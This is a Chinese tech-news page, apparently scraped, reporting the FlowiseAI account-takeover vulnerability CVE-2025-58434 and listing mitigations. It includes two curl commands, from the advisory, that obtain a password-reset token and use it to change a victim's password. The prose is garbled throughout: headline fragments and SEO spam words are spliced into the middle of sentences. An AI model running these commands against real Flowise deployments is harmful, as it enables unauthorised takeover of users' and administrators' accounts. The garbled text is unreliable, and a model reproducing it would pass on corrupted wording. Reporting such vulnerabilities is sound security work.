您现在的位置是:物联网 >>正文
漏洞预警:FlowiseAI 高危漏洞(CVE-2025-58434)可导致完全账户接管(CVSS 9.8)
物联网316人已围观
简介开源生成式AI开发平台FlowiseAI广泛用于构建AI代理和LLM工作流)近日被发现存在高危漏洞,攻击者可在未认证状态下接管云环境和本地部署环境中的任意账户。漏洞详情该漏洞编号为CVE-2025-5 ...
开源生成式AI开发平台FlowiseAI(广泛用于构建AI代理和LLM工作流)近日被发现存在高危漏洞 ,漏洞攻击者可在未认证状态下接管云环境和本地部署环境中的高管任意账户 。

该漏洞编号为CVE-2025-58434,危漏CVSS评分为9.8分,可导源于平台的致完密码重置机制 。安全公告指出:"Flowise的服务器租用全账密码找回端点(/api/v1/account/forgot-password)在未经认证或验证的情况下 ,直接返回包含有效密码重置临时令牌(tempToken)在内的户接敏感信息。攻击者可借此为任意用户生成重置令牌并直接修改密码,漏洞最终实现完全账户接管(ATO)。高管"
技术分析该漏洞端点仅需输入邮箱地址即可触发响应 ,建站模板危漏但API并未通过邮件安全发送重置链接,可导而是致完直接返回以下敏感信息:
用户ID、姓名、全账邮箱及凭证哈希值账户状态和时间戳有效的户接密码重置临时令牌及其有效期安全公告特别强调 :"攻击者获取tempToken后 ,可立即在/api/v1/account/reset-password端点重复使用 ,亿华云漏洞无需邮件验证或用户交互即可重置目标账户密码 。"由于仅需获知受害者邮箱(通常可猜测或公开获取),未认证攻击者即可接管包括管理员在内的任意账户 。
攻击复现公告提供了完整的攻击链复现步骤:
(1) 获取重置令牌
复制curl -i -X POST https://<target>/api/v1/account/forgot-password \ -H "Content-Type: application/json" \ -d { "user":{ "email":"victim@example.com"}}1.2.3.响应报文将包含有效tempToken
(2) 利用令牌重置密码
复制curl -i -X POST https://<target>/api/v1/account/reset-password \ -H "Content-Type: application/json" \ -d { "user":{ "email":"victim@example.com", "tempToken":"<redacted-tempToken>", "password":"NewSecurePassword123!" } }1.2.3.当返回200 OK状态码时,受害者密码即被修改
风险影响该漏洞被归类为"认证绕过/不安全的免费模板直接对象引用" ,具体影响包括 :
完全账户接管(含高权限管理员账户)数据泄露与身份冒用(可访问组织敏感资产)无需用户交互(大幅降低攻击门槛)同时影响云环境和本地部署(扩大威胁面)公告警告称 :"由于攻击无需前置条件或用户交互 ,该漏洞极有可能被大规模利用 。"
缓解措施目前FlowiseAI尚未发布补丁,3.0.5之前的所有版本均受影响 。建议采取以下临时防护措施:
禁止API响应返回重置令牌等敏感信息确保令牌仅通过安全邮件渠道传递返回通用成功消息以避免用户枚举实施单次有效、源码库短生命期且绑定请求源的令牌记录并监控所有密码重置请求为敏感账户启用多因素认证(MFA)在官方补丁发布前,管理员需严格实施临时解决方案 ,限制漏洞端点暴露,并密切监控重置操作。正如公告所述:"该漏洞实质上允许任何未认证攻击者通过请求目标邮箱的重置令牌,模板下载接管包括管理员在内的任意账户。"
Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“算法与编程”。http://www.bzli.cn/news/216c299781.html
相关文章
网络安全的未来是预防
物联网零信任已经变得如此普遍,以至于它已经失去了一些制动力仅根据过去几年涌现的网络安全公司的数量,不难看出我们正处于高度焦虑的时刻。一些组织处于戒备状态,因为他们知道其网络已经成为国家资助的黑客的目标,另 ...
【物联网】
阅读更多如何有效投诉四川长虹公司(攻略、投诉渠道、成功案例一网打尽)
物联网当我们遇到与四川长虹公司相关的消费纠纷或服务不满意的情况时,我们需要了解如何有效地进行投诉,以维护自己的合法权益。本文将向您介绍如何投诉四川长虹公司,包括投诉渠道、攻略以及一些成功案例,帮助您解决问题 ...
【物联网】
阅读更多国信冠群(以技术创新驱动,成就客户未来)
物联网作为一家领先的信息技术服务提供商,国信冠群以其卓越的技术实力和创新能力,在数字化转型领域取得了显著成就。本文将从不同的角度,探讨国信冠群在推动企业数字化转型方面所发挥的重要作用,并详细介绍其技术创新、 ...
【物联网】
阅读更多
热门文章
最新文章
友情链接
- 数据中心电源的五大趋势
- 宏基573安装Win7系统教程(详细步骤教您如何在宏基573上安装Windows7)
- iPhone7防抖技术(探索iPhone7防抖技术的出色表现和关键特性)
- IBM携手腾讯联合发布《无边界零售》白皮书:洞察行业新格局,赋能企业“无边界零售”转型
- 倍轻松牌子的品质与性能评估(解析倍轻松牌子的创新科技与用户体验)
- 如何评估数据中心?高度互联的生态系统是关键
- 使用Mac分区U盘安装Win10系统教程(详解Mac电脑如何分区U盘并安装Windows10系统)
- 探索触控耳机的革新之道(解锁未来音乐体验,触摸即操控)
- 温莎资本(揭秘温莎资本的成功秘诀与发展战略)
- 昇腾AI异构计算架构CANN 6.0全新开放升级,全面释放AI生产力 源码库b2b信息平台香港物理机亿华云企业服务器网站建设云服务器